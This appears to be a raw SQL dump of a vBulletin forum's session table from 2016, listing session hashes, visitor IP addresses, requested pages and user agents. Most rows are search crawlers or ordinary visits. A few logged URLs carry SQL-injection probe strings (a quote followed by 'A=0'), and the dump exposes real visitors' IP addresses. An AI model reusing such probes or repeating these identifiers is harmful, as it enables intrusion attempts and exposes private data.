('81bfe69aa02309638a6c307acc86e62d', 0, '172.68.11.253', '54fe18c99e79a2671eb7a5764ccbbb4c', 1470836512, '/showthread.php?p=2798&mode=threaded', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c9fbcd2b375002139ede2c317cee1c6', 0, '172.68.11.251', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475301570, '/faq.php?faq=vb3_board_faq', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a38b06058183849156f9f9ae167f2bba', 0, '172.68.10.243', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475265045, '/member.php?u=33', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ba1f8a1b52e392e364b1980bba27b3d4', 0, '172.68.11.248', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475337122, '/showthread.php?p=2798', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('89cb29bd3395b87c9495a54c223959d5', 0, '172.68.10.253', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475260229, '/forumdisplay.php?f=32&daysprune=-1&order=asc&sort=title', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('881d7fcba11280173def1d6cf999a762', 0, '172.68.10.247', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475337247, '/showthread.php?p=2928', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7874c73f461dd97e06b3858e2e700b7c', 0, '75.171.19.150', '42bcf60f9fef22112bf75f6829d35b2e', 1467441917, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a2b6422a67b97e7770d2a9b56af031bb', 0, '2a02:598:2::107', '9af6876a1da5c0cd1dc4895cf4c76e79', 1473146331, '/online.php?', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f5ccd013d10ed1b59963a792ef6df994', 0, '31.135.231.122', '901dbaffca8086c23a0753f44609e2d0', 1467450320, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('69d5c0b1e2098b5630d4e124dadbd2aa', 0, '2a02:598:a::79:', '88c8766c42da92333f96c3e7542d6f3b', 1467625425, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0992f72643f2a64e28e32d7bbe4d1e14', 0, '100.43.90.10', '31f0b0381586e7e9ee00c6a6519d3cb4', 1475316343, '/showthread.php?t=2347', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8021c23d7eab1f7eef3ac4f930bbc5fd', 0, '112.198.83.232', 'c27f6c9a1070b528c24f9195f11a7e14', 1467461743, '/register.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4d623eec18760f4fadc251d6789f2cd', 0, '46.129.21.245', '0dd89d111d0cdcad7ba12569e1e1c59e', 1467468091, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be781aa0a0b45afab2ad008020394fcc', 0, '79.97.72.92', '8e8a54f2442da13a898cdb5325211ff4', 1467471061, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d30427a82f35b312584fa114254453a', 0, '46.246.22.56', '14b7d9237de132466e5179c47a27e931', 1467474154, '/register.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('552f80a29f9ccfa42c778ca4bc2c5401', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467478594, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d53862ac9e68557aa26bbe23b18ffb47', 0, '39.40.222.118', '0253b15a0efe8f6472e208e0e3570f43', 1467478898, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f65e8edf29064674c509f4e3a52d3efc', 0, '185.112.116.45', '5e44f2f47993040a2a7925b778a7184a', 1467479261, '/login.php?vb_login_username=&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=&vb_login_md5password_utf=', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d4bf6e9b1f838420c9fc0164efb3ca9c', 0, '185.112.116.45', 'c731662f668bb3125c47e88e8d41187b', 1467479262, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2a370019b2670f7789f62dbcaf0d1b61', 0, '185.112.116.45', '2b30dfc4d929f32daeb517a0bd66062d', 1467479265, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3055d93f3292c4ec81cce1c31956e95e', 0, '185.112.116.45', 'a706f69e9271c26ba3db1dd954df0fa8', 1467479267, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6046e1556e71c2722a90ad12210ef23c', 0, '185.112.116.45', '400ee4ca70340fa17c9288c7bc78ddf4', 1467479270, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('caf110b0734057a9117344ab8338272b', 0, '185.112.116.45', '497550a5013ff9ada7e57d4b4bf73e61', 1467479271, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('760fe5bf2f0f39e5cf452165d3b65b21', 0, '46.246.116.105', '039eb2ecb86fc6074eb6b831a39538ae', 1467491771, '/memberlist.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('de7cdf5c09d36a1e9f29f84477e356a1', 0, '2003:c1:abc2:66', 'b2805c7c90724ffbe5cc5ecd9244c953', 1467497681, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e009a0dd6bcdaabbfe48cbd356f5516a', 0, '192.40.89.70', '6a9034d485a48858580e36c08a27eb7d', 1467500908, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f4620720759673ce113cab3bb2e5f33c', 0, '66.249.65.70', '0ff4417ffc4aa97369fda8263e0a4dca', 1467509125, '/showthread.php?t=2505', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c19c17e0925e7978aa426bbc1bbd0022', 0, '67.149.2.233', '75ef14c7a2b06b550b0a7b92acddfa4f', 1467510627, '/showthread.php?t=1030', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4736aea4f03ffa82d93201aa066469ad', 0, '54.198.177.244', '9d7c61070c3202fa145d97a963cc8008', 1467519033, '/showthread.php?t=2383', 'Mozilla/5.0 (compatible; linkdexbot/2.2; +http://www.linkdex.com/bots/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('03312b57ff7cab3494414e2417d55edf', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467521746, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6e09068badef547d5892ee18556f8ce5', 0, '23.92.123.146', 'd47297abc0a56f5d242be36f3758c20c', 1467530566, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ab8bca07b06634065266738e98d31df1', 0, '172.68.10.203', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475312713, '/search.php?do=finduser&userid=182&searchthreadid=2312', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f151a1f7422978cd7d807173cc6c99d9', 0, '82.132.217.16', '5551dd1e88ee871a85f7a794affd67ac', 1467531831, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 6P Build/MTC19V) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8052aa3e1342964732b925e67c06e695', 0, '103.255.178.197', '108ceb01c4eb645db9c1cbc0cccfa28c', 1467539661, '/search.php?do=getnew', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d1e2d64b8b15ca29f97ff95d93e545b', 0, '121.214.130.64', '99a9fbdaf8cd5ef7998f1cc0319cc73c', 1467542830, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5760f3da88b5d515b474f209008ca77', 0, '31.131.99.99', 'e364b415268a01ab0bb81a2c9eeb2a99', 1467554818, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('50b0a948501f845e55ee3a155a6b68e7', 0, '85.118.134.144', '0ea84dd59295721f3715275d246e05d2', 1467560416, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0ab0614787b858626a434599b23dec28', 0, '216.144.226.152', 'ddea11a35b1bfa5659f4e83fd250ad77', 1467561073, '/showthread.php?t=2334', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4d17fa2501462ea927ac16060f36566', 0, '23.92.123.69', 'd47297abc0a56f5d242be36f3758c20c', 1467561099, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a4d4cc79ec040029937a7053e59302c6', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467564977, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('231096c2a99dae3e991138b9991e75e6', 0, '207.46.13.60', '5e207e311e22cdc3b2095126a922fa93', 1467566365, '/showthread.php?t=1835', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b399163a59062f7f2c25f46834106aa', 0, '172.56.21.179', 'adfebda003a55af8e7805ceb5ed6db15', 1467571415, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5ce24c5f26b6814f59814f0193edca75', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1468130749, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9a372154a2a2f55ce57e85f9e92958cd', 0, '178.73.197.246', '167b7fdd13f0dba659590393beecaa1c', 1467577870, '/memberlist.php', 'Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e2707032f3e5a83416a510f44528c387', 0, '172.68.34.56', '37a60411c341250cf0113f4eba911963', 1470275420, '/archive/index.php/t-2371.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c29a2d2512e1ead0f9cd8cf13127163b', 0, '46.29.249.183', '4c74cb8d9aa44627e49411b9b82b2362', 1467578945, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c130b9eb791cdd1a353fe4fe0fd7b2f3', 0, '198.8.80.44', '53b843f869e211aa45a30ef0e30fc8d5', 1467582302, '/forumdisplay.php?f=37', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd9373a244d541adec062a80883d382a', 0, '207.46.13.63', '5e207e311e22cdc3b2095126a922fa93', 1467602008, '/register.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7550213740b440b231cc1577ac0c4026', 0, '157.55.39.77', '23f3103f44bc3badcba53554e5e4cb6d', 1467759077, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('90cf18a1e0dee56dde5c4860ac3855d3', 0, '40.77.167.86', 'c5490a5a8e1813ac25cf9e19091dcb85', 1467602178, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9a623d17654fa3e294c1f25d5124d7d', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467607625, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('79265fb7ec60cdfdd88363b8a7b1324b', 0, '163.172.136.101', 'f6bf2282451ffdd310bc26f4b343efb8', 1467614108, '/showthread.php?p=1141&mode=threaded', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('885a165d5ed56bb9acc81c238975dcec', 0, '85.25.103.119', 'eb4373142bce461b8290b3db91c10f9b', 1474910317, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('518ed39ce50bdba0fea7a83afd59bb66', 0, '181.66.244.14', '607ac7d0e7a424ef39cbb79e891309dc', 1467615152, '/showthread.php?p=3012', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c5d5966f241d4be2c1b9509f48f81757', 0, '62.210.37.82', '34c48ec1e1605cc7cb7c266918beaceb', 1467620596, '/login.php?do=logout&logouthash=1467620594-4cde291e68092099107ff0c09cdd10dc72d344b6', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('14e81d5b8f99ed49d2895d5e38f66ced', 0, '78.188.227.46', 'eaffebb686527164d1e74d022ce5096b', 1467638132, '/login.php?do=logout&logouthash=1467638124-431e1b05b63730ce0875e8f2bcbc213cab584279', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1ca32c5765b66f27fb2e370d686dd33b', 0, '159.224.17.60', 'b00a0cb1a29331c310d6f4be22aa4fc8', 1468060884, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a0201600b1700027a2b83df4f2453ac9', 0, '85.118.134.144', '6b911daffe66b1e47c95976c65c80c04', 1467645970, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aeab5bfed20f4fc597dd40889972f8da', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467650513, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('b8c20f9f35c5bc7d94182797b71c6e8b', 0, '2601:409:c100:c', '5a4d1f4691ab870140598cab0ffb0adb', 1467651065, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.10', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6150e4dad2e824c3abe424ddf030fe07', 0, '91.224.179.39', '704344911e3917571f1acf97d96b2e03', 1467658047, '/member.php?u=181\'A=0', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4b1ba022320a8db51bbbd4577fe9c54b', 0, '176.8.10.29', 'ca7e9d64b22739c8987268606d1c38fa', 1467662531, '/search.php?searchthreadid=2483\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8d11a29b5141218643cec0bff0b649e6', 0, '109.65.58.218', '8d02779700da7dc845e9dfe987edb17b', 1467663152, '/search.php?do=getdaily', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/50.0.2661.102', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('48020accb1ba4d27a2003c2802e4231e', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467693496, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('57c56127668742486f4fd7add7fb6dd5', 0, '188.138.9.49', '33545809655f26bc1006c97828385554', 1469478424, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b8da04d9ed0c8024d0d4e7f80c89832c', 0, '2a02:598:2::103', 'ac5e90fb93c5282a3a8583dd2263b3fa', 1467700055, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('dd19668cc729227a9e61b1982e076406', 0, '23.92.123.112', 'dd1272896a87e21da2b6f5684bb7ed07', 1467700252, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('be8573bb517f988099e34daaee11e4fb', 0, '2a02:598:a::78:', '30bca46a38df65999d946e556a3edb73', 1469421043, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f403693ff6910c2f7585d0b5380029d7', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1467708148, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('81b8bf082fb0be5e0fc5558c2e54d27e', 0, '2a02:598:a::78:', '8f430cec88ca3344ca9a90b59482deef', 1467714540, '/memberlist.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd9c979b601133e73ba9ac5e3311b25b', 0, '94.242.246.23', 'e31736756354e678a339a7ac6e428482', 1467721083, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e0baf14691c0c55efa91c5ac37b05c49', 161, '172.68.29.181', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1467727090, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c56069028a655870bd209210abd874b5', 161, '54.233.145.152', '7b7d15bc9ebbf00e95fb18a8a25e3f33', 1467733334, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c9391ccd8b1c5e82c015b53881b38421', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467736756, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5c12f6568d4fc9488f1e473785326f1a', 0, '86.155.3.178', '11ea61e4fb5e6c67f7c6630938e098d4', 1467737132, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7c5233de4dcb81542278c06160b85a4', 0, '172.68.11.248', 'd5423d952b3b6325ab3ae08ce38f4770', 1467740879, '/showthread.php?p=2959', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7411e1df3c47fcc23cff502b201503fc', 0, '172.68.10.238', '54fe18c99e79a2671eb7a5764ccbbb4c', 1475198633, '/search.php?do=finduser&userid=44&searchthreadid=1699', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0cf4277e632f0b53396a37f2b6ac63db', 0, '50.7.176.2', 'b7d4742fb810f81f4b3f0ad2b8cce79b', 1467748925, '/register.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f7bdb341595eb3ae521ed5ee8f45e338', 0, '92.9.154.199', '8d2c56fa0a655c9abb02d7843a7cf44b', 1467751983, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a409887233f90f0a4b8de5f005c4ffc7', 0, '172.68.10.250', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475267767, '/member.php?u=119', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('89664f54c32185327ae9380a048b0786', 0, '58.28.152.211', '2c3367302a8adba9bb24b23bd5970628', 1467768394, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ada12b7bfd254ce62d3dd09e342a2a8b', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1467779461, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('d55dc6ce9ba3ebf2e648af03ce7e79f0', 0, '157.55.39.85', '23f3103f44bc3badcba53554e5e4cb6d', 1467820065, '/member.php?u=387', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8865469df1c25ef06c07f2c4a99978a6', 0, '213.233.101.180', '310a1d590da4a4e8138425da585f284b', 1467795161, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2dc829e513c285dba97b32d1813764b4', 0, '172.68.11.251', 'd94ca6ce358f48877fc463486a1de1ea', 1467796790, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea780d9c700d12bfd7ec16934db9179c', 0, '31.24.221.3', '6643bff654a6362024673508e19e6159', 1467802254, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d55f8eb8083fac681c522722b1700d04', 0, '172.68.11.206', '2af5f2b76dd4bc1dd40303b6a67c47c3', 1467807415, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e668edd140e1a833b5f50d7f10dfd7aa', 0, '100.43.81.149', '290bdd0615b8b4f3cab878e4bc01abdb', 1467807418, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Versio', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d651bd9f8ea4faa427eca70eb239b226', 0, '172.68.10.241', 'b0e0cffcf15abf4250ddba298e0a63e7', 1467819207, '/search.php?searchthreadid=2483\'A=0', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ddef5ab51350eb51ee35accaab765e23', 0, '83.7.3.223', '3c1ec6f806edb5df2ded06e342b46fa3', 1467819345, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a06c79f1efb3432ec908e1d531f5da9', 0, '157.55.39.126', '23f3103f44bc3badcba53554e5e4cb6d', 1467819776, '/printthread.php?t=1031', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
